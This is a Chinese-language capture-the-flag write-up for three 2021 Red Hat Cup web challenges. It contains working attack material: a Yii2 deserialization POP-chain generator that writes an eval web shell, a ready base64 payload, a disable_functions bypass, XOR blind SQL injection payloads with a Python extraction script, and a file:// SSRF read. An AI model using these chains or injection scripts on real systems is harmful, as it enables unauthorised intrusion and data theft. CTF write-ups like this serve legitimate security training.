[2021红帽杯]Web writeip

find_it

老套路扫一下目录

[2021红帽杯]Web writeip

貌似只有君子协定有用,打开看看

When I was a child,I also like to read Robots.txt  Here is what you want:1ndexx.php 

打开1ndexx.php 发现打不开,

[2021红帽杯]Web writeip

尝试一下是否有备份

/.1ndexx.php.swp 

发现了一串代码:

<?php $link = mysql_connect('localhost', 'root'); ?> <html> <head> 	<title>Hello worldd!</title> 	<style> 	body { 		background-color: white; 		text-align: center; 		padding: 50px; 		font-family: "Open Sans","Helvetica Neue",Helvetica,Arial,sans-serif; 	}  	#logo { 		margin-bottom: 40px; 	} 	</style> </head> <body> 	<img id="logo" src="logo.png" /> 	<h1><?php echo "Hello My freind!"; ?></h1> 	<?php if($link) { ?> 		<h2>I Can't view my php files?!</h2> 	<?php } else { ?> 		<h2>MySQL Server version: <?php echo mysql_get_server_info(); ?></h2> 	<?php } ?> </body> </html> <?php  #Really easy...  $file=fopen("flag.php","r") or die("Unable 2 open!");  $I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));   $hack=fopen("hack.php","w") or die("Unable 2 open");  $a=$_GET['code'];  if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|~|^|`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){ 	die("you die"); } if(strlen($a)>33){ 	die("nonono."); } fwrite($hack,$a); fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);  fclose($file); fclose($hack); ?> 

构造payload:

/?code=<?php%20phpinfo();?> 

然后访问一下h[2021红帽杯]Web writeip

framework

打开发现是yii2反序列化

随即打开百度,来找一下复现:

https://mp.weixin.qq.com/s?__biz=MzU5MDI0ODI5MQ==&mid=2247485129&idx=1&sn=b27e3fe845daee2fb13bb9f36f53ab40

然后回到题目,按照常理我扫了一下网站目录,发现了www.zip" :

[2021红帽杯]Web writeip

下载到本地发现正好是源码,就在本地搭建环境

丢进去phpstudy里,按照大佬的[2021红帽杯]Web writeip

然后再新建个poc.php

在里面写:

<?php namespace yiirest{     class CreateAction{         public $checkAccess;         public $id;         public function __construct(){             $this->checkAccess = 'assert';             $this->id = 'file_put_contents("/var/www/html/web/1.php","<?php eval($_POST[111]);");';         }     } } namespace Faker{     use yiirestCreateAction;      class Generator{         protected $formatters;          public function __construct(){             $this->formatters['close'] = [new CreateAction(), 'run'];         }     } }  namespace yiidb{     use FakerGenerator;      class BatchQueryResult{         private $_dataReader;          public function __construct(){             $this->_dataReader = new Generator;         }     } } namespace{     echo base64_encode(serialize(new yiidbBatchQueryResult)); } ?> 

然后再生成一下payload

[2021红帽杯]Web writeip

传进去:

/index.php?r=site/about&message=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6NjoiYXNzZXJ0IjtzOjI6ImlkIjtzOjczOiJmaWxlX3B1dF9jb250ZW50cygiL3Zhci93d3cvaHRtbC93ZWIvMS5waHAiLCI8P3BocCBldmFsKFwkX1BPU1RbMTExXSk7Iik7Ijt9aToxO3M6MzoicnVuIjt9fX19 

一开始,传进去看到这个报错,以为没有成功,后来访问了一下1.php发现自己成功了QAQ

打开蚁剑,直接连上马:

[2021红帽杯]Web writeip

看了一圈发现flag再根目录:

[2021红帽杯]Web writeip

然后发现没有权限。。。。。。。又卡住了

但是我做题晚上刚刚复现了蓝帽的web题,有disable_functions绕过插件,就去试了一下

[2021红帽杯]Web writeip

然后试着读了一下

[2021红帽杯]Web writeip

它就出来了!!!!!!!

#WebsiteManger

是一道注入题

跑了一下sqlmap

发现了两个参数:

username password

[2021红帽杯]Web writeip

/image.php下的id

注入了一下发现前两个都不是,随即对id下手

尝试了几种注入都无效,最后发现是异或注入

构造payload:

/image.php?id=1^(ascii(substr((select(database())),1,1))>1)^1 

有回现,尝试变更参数

直到:

/image.php?id=1^(ascii(substr((select(database())),1,1))>99)^1 

时没有回显,证明数据库第一位是c

获取第二位:

/image.php?id=1^(ascii(substr((select(database())),2,1))>1)^1 

发现到117没有回显

证明第二位为t

依次类推,获得第三位为f

当数据库位数为4位时始终没有回显。证明只有三位,且数据库名为ctf

知道了数据库名就好办了,直接起脚本,依次爆):

import requests import time url = "http://eci-2zefme7yqvztqdsonszy.cloudeci1.ichunqiu.com/image.php?id=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')),{0},1))>{1})^1"  word="" for i in range(1,1000):     l = 32     h = 128     mid = (l + h)     while (l < h):         nurl=url.format(i,mid)         r=requests.get(url=nurl)         if 'JFIF' in r.text:             l = mid + 1         else:             h = mid         mid = (l + h) // 2         time.sleep(0.1)     word += chr(mid)     print(word) print(word) 

获得表名为 users

之后依次修改url 继续 爆破

最终爆破出来密码为(当前环境下的密码):

[2021红帽杯]Web writeip

然后登录管理员账号:

[2021红帽杯]Web writeip

抓包查看发现是ssrf 读取文件漏洞

构造payload:

file:// /flag 

获得flag

[2021红帽杯]Web writeip

版权声明:玥玥 发表于 2021-05-11 12:23:34。
转载请注明:[2021红帽杯]Web writeip | 女黑客导航